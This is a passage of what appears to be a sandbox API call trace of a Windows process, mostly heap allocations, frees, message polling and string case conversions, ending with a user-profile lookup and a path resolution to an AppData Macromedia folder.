(HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0200.837] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.837] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0200.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0200.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0200.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0200.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.837] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.837] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.838] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0200.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0200.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0200.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0200.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.838] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0200.838] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0200.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0200.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0200.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0200.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0200.838] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0200.838] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.838] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.838] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.838] CryptReleaseContext (hProv=0xad63f8, dwFlags=0x0) returned 1 [0200.839] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.839] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.839] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.839] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.839] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.839] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.839] FreeLibrary (hLibModule=0x74d40000) returned 1 [0200.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0200.839] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0200.839] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0200.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.839] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0200.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0200.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0200.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0200.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.840] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0200.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0200.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0200.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0200.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.841] CloseHandle (hObject=0x1f8) returned 1 [0200.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0200.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0200.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0200.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0200.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0200.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0200.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0200.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0200.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0200.842] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0200.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0200.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0200.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0200.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0200.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0200.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0200.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0200.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0200.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0200.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0200.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0200.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0200.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0200.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0200.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0200.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0200.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0200.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0200.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0200.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0200.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0200.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0200.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0200.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0200.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0200.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0200.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0200.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0200.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0200.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0200.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0200.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0200.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0200.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0200.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0200.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0200.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0200.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0200.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0200.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0200.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0200.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0200.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0200.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0200.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0200.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0200.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0200.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0200.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0200.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0200.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0200.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0200.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0200.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0200.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0200.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0200.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0200.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0200.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0200.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0200.846] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0200.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0200.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0200.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0200.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0200.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0200.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0200.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0200.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0200.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0200.847] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0200.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0200.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0200.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ff0 [0200.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0200.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0200.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0200.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0200.847] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0200.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0200.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0200.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0200.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0200.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0200.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0200.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0200.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0200.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0200.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0200.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0200.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0200.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0200.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0200.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0200.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0200.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0200.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0200.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0200.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0200.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0200.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0200.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0200.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0200.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0200.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0200.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x72) returned 0x24f5278 [0200.849] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Macromedia", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia", lpFilePart=0x8bedfc*="Macromedia") returned 0x38 [0200.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0200.849] 